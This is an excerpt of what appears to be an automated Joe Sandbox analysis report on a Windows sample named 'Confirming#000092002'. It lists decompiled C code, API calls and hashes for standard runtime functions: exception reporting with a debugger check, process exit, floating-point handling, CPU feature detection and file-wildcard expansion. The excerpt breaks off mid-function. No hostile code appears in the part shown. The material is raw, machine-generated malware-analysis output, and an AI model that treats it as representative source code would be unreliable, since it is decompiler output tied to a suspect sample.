				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xeb9008; // 0x64e1d101
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00EA4B51(_t41);
					_pop(_t61);
				}
				E00EA5210(_t66,  &_v804, 0, 0x50);
				E00EA5210(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00EA4B51(_t57);
				}
				return E00EA403C(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00ea72e0
0x00ea72e0
0x00ea72e0
0x00ea72eb
0x00ea72f0
0x00ea72f2
0x00ea72fa
0x00ea72fc
0x00ea72ff
0x00ea7304
0x00ea7304
0x00ea7310
0x00ea7323
0x00ea7331
0x00ea7337
0x00ea733d
0x00ea7343
0x00ea7349
0x00ea734f
0x00ea7355
0x00ea735b
0x00ea7361
0x00ea7367
0x00ea736e
0x00ea7375
0x00ea737c
0x00ea7383
0x00ea738a
0x00ea7391
0x00ea7392
0x00ea739b
0x00ea73a1
0x00ea73a4
0x00ea73aa
0x00ea73b7
0x00ea73c0
0x00ea73c9
0x00ea73d2
0x00ea73e0
0x00ea73e2
0x00ea73f7
0x00ea7403
0x00ea7406
0x00ea740b
0x00ea7418

APIs

IsDebuggerPresent.KERNEL32 ref: 00EA73D8
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EA73E2
UnhandledExceptionFilter.KERNEL32(?), ref: 00EA73EF

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 5644f17cc6aec30393880f60eb116b326139b3fa47f23b46ec93abf7073500d8
Instruction ID: d0e15de39aafd1ff838871ef310954670c25e09a6651a85b2207cb0fac1497f8
Opcode Fuzzy Hash: 5644f17cc6aec30393880f60eb116b326139b3fa47f23b46ec93abf7073500d8
Instruction Fuzzy Hash: BF31C2759012189BCB21DF24DC89BCDBBB4AF08310F5052EAA41CAB2A1E774AB858F55

Uniqueness

Uniqueness Score: -1.00%

Function 00EA7B8E Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00EA7B8E(int _a4) {
				void* _t14;

				if(E00EA9DF6(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00EA7C13(_t14, _a4);
				ExitProcess(_a4);
			}

0x00ea7b9b
0x00ea7bb7
0x00ea7bb7
0x00ea7bc0
0x00ea7bc9

APIs

GetCurrentProcess.KERNEL32(?,?,00EA7B8D,?,00000000,?,?,?,00EA9C0E), ref: 00EA7BB0
TerminateProcess.KERNEL32(00000000,?,00EA7B8D,?,00000000,?,?,?,00EA9C0E), ref: 00EA7BB7
ExitProcess.KERNEL32 ref: 00EA7BC9

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 99cc13800cf49205e186e5aed5188090de4324b124a5d0ccf7232fb74a18c867
Instruction ID: 7e5096fc5e27b35702d324fc85148afa47e50f01beb78931f0c8feb2ee322f4f
Opcode Fuzzy Hash: 99cc13800cf49205e186e5aed5188090de4324b124a5d0ccf7232fb74a18c867
Instruction Fuzzy Hash: ACE04631004148AFCF12AF16DD19E8A3FAAEB4A365B400464F844AE131CB39ED81CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EAFA9C Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00EAFA9C(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E00EAE06F(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E00EADFDB(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x00eafaaa
0x00eafab1
0x00eafab6
0x00eafabc
0x00eafabf
0x00eafac5
0x00eafaca
0x00eafacf
0x00eafacf
0x00eafad5
0x00eafada
0x00eafadf
0x00eafadf
0x00eafae6
0x00eafaeb
0x00eafaf0
0x00eafaf0
0x00eafaf7
0x00eafafc
0x00eafb01
0x00eafb01
0x00eafb08
0x00eafb0d
0x00eafb12
0x00eafb12
0x00eafb1a
0x00eafb2a
0x00eafb3c
0x00eafb4e
0x00eafb61
0x00eafb73
0x00eafb7b
0x00eafb80
0x00eafb85
0x00eafb85
0x00eafb8c
0x00eafb91
0x00eafb91
0x00eafb98
0x00eafb9d
0x00eafb9d
0x00eafba4
0x00eafba9
0x00eafba9
0x00eafbb0
0x00eafbb5
0x00eafbb5
0x00eafbbf
0x00eafbc1
0x00eafbfb
0x00eafbc3
0x00eafbc8
0x00eafbec
0x00eafbf4
0x00eafbe8
0x00eafbe8
0x00eafbfe
0x00eafc05
0x00eafc07
0x00eafc29
0x00eafc31
0x00eafc34
0x00eafc34
0x00eafc36
0x00eafc36
0x00eafc41
0x00eafc47
0x00eafc4c
0x00eafc53
0x00eafc8d
0x00eafc98
0x00eafc9e
0x00eafca1
0x00eafca4
0x00eafcb0
0x00eafcb8
0x00eafc55
0x00eafc58
0x00eafc64
0x00eafc6a
0x00eafc70
0x00eafc73
0x00eafc7c
0x00eafc7c
0x00eafcbb
0x00eafcc9
0x00eafccf
0x00eafcd2
0x00eafcd7
0x00eafcd9
0x00eafcdc
0x00eafcdc
0x00eafce1
0x00eafce3
0x00eafce6
0x00eafce6
0x00eafceb
0x00eafced
0x00eafcf0
0x00eafcf0
0x00eafcf5
0x00eafcf7
0x00eafcfa
0x00eafcfa
0x00eafcff
0x00eafd01
0x00eafd01
0x00eafd0e
0x00eafd11
0x00eafd48
0x00eafd13
0x00eafd13
0x00eafd16
0x00eafd41
0x00eafd36
0x00eafd36
0x00eafd4a
0x00eafd52
0x00eafd55
0x00eafd74
0x00eafd79
0x00eafd79
0x00eafd7b
0x00eafd80
0x00eafd8c
0x00eafd82
0x00eafd85
0x00eafd85
0x00eafd91
0x00eafd91
0x00eafd57
0x00eafd5a
0x00eafd69
0x00000000
0x00eafd69
0x00eafd5c
0x00eafd5f
0x00eafd61
0x00eafd61
0x00000000
0x00eafd5f
0x00eafd18
0x00eafd1b
0x00eafd31
0x00000000
0x00eafd31
0x00eafd20
0x00eafd22
0x00eafd22
0x00eafd20
0x00000000
0x00eafd11
0x00eafc0e
0x00eafc1c
0x00eafc24
0x00000000
0x00eafc24
0x00eafc12
0x00eafc17
0x00eafc17
0x00000000
0x00eafc12
0x00eafbcf
0x00eafbdd
0x00eafbe5
0x00000000
0x00eafbe5
0x00eafbd3
0x00eafbd8
0x00eafbd8
0x00eafbd3

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EAFA97,?,?,00000008,?,?,00EAF72F,00000000), ref: 00EAFCC9

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0c55cd06a300551008d85c1c3171009018e90e8a1223206de62616f917749749
Instruction ID: 92a7b202bc1577aa1163311615e9bea32eaa4852e2c6f73fb4b3dbe9247d4a06
Opcode Fuzzy Hash: 0c55cd06a300551008d85c1c3171009018e90e8a1223206de62616f917749749
Instruction Fuzzy Hash: 01B15E31610609CFD715CF68C496BA57BF0FF4A368F259668E899DF2A1C335E982CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00EA4775 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00EA4775(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0xfe2724 =  *0xfe2724 & 0x00000000;
				 *0xeb9010 =  *0xeb9010 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0xfe2728; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0xfe2728 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0xeb9010; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0xfe2724 = 1;
					 *0xeb9010 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0xfe2724 = 2;
						 *0xeb9010 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0xeb9010; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0xfe2724 = 3;
								 *0xeb9010 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0xfe2724 = 5;
									 *0xeb9010 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0xeb9010 =  *0xeb9010 | 0x00000040;
										 *0xfe2724 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0xfe2728; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0xfe2728 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00ea4775
0x00ea4778
0x00ea4782
0x00ea4793
0x00ea4945
0x00ea4948
0x00ea4948
0x00ea4799
0x00ea479f
0x00ea47a4
0x00ea47a8
0x00ea47ac
0x00ea47ae
0x00ea47b0
0x00ea47b3
0x00ea47b8
0x00ea47c1
0x00ea47d2
0x00ea47dd
0x00ea47e3
0x00ea47e4
0x00ea47ea
0x00ea47ed
0x00ea47f7
0x00ea47fa
0x00ea47fd
0x00ea4800
0x00ea4845
0x00ea4845
0x00ea484b
0x00ea484b
0x00ea4850
0x00ea4851
0x00ea4857
0x00ea4889
0x00ea4859
0x00ea485b
0x00ea485c
0x00ea4862
0x00ea4865
0x00ea4867
0x00ea486a
0x00ea486d
0x00ea4870
0x00ea4873
0x00ea487c
0x00ea4881
0x00ea4881
0x00ea487c
0x00ea488c
0x00ea4891
0x00ea4894
0x00ea489e
0x00ea48a9
0x00ea48af
0x00ea48b2
0x00ea48bc
0x00ea48c7
0x00ea48d3
0x00ea48d6
0x00ea48d9
0x00ea48e4
0x00ea48e9
0x00ea48eb
0x00ea48f0
0x00ea48f3
0x00ea48fd
0x00ea4905
0x00ea490a
0x00ea4914
0x00ea4922
0x00ea4935
0x00ea493c
0x00ea493c
0x00ea4922
0x00ea4905
0x00ea48e9
0x00ea48c7
0x00000000
0x00ea4944
0x00ea4805
0x00ea480f
0x00ea4834
0x00ea483a
0x00ea483d
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00EA478B

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e6c6510eeb701193f5802062348b27db6221c4e0d77d6116b6cd26cc3b907b0c
Instruction ID: f5f9ed81cada428d7f5f47b0958d33ba01d2ce4521b755fa2531079fe2698719
Opcode Fuzzy Hash: e6c6510eeb701193f5802062348b27db6221c4e0d77d6116b6cd26cc3b907b0c
Instruction Fuzzy Hash: 3551C0B2901259CFDB29CF59E8817AABBF4FB89354F208429E500FF290D3B4A940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EAA22B Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00EAA22B(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t2 = _t133 + 1; // 0x1
				_t155 = _t2;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t126 = _t5 + _t135;
					_t165 = E00EA9E27(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E00EACB84(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E00EAA626(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E00EA8B82(_t165);
								_t167 = _v8;
							}
							E00EA8B82(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E00EACB84(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00EA749C();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0xeb9008; // 0x64e1d101
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E00EAD0C0(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E00EAA01F(_t138 - _t160 + 1, _t160,  &_v672, E00EAA533(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
										_t94 = E00EA9F50( &(_v604.cFileName),  &_v636,  &_v605, E00EAA533(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E00EAA22B(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E00EA8B82(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
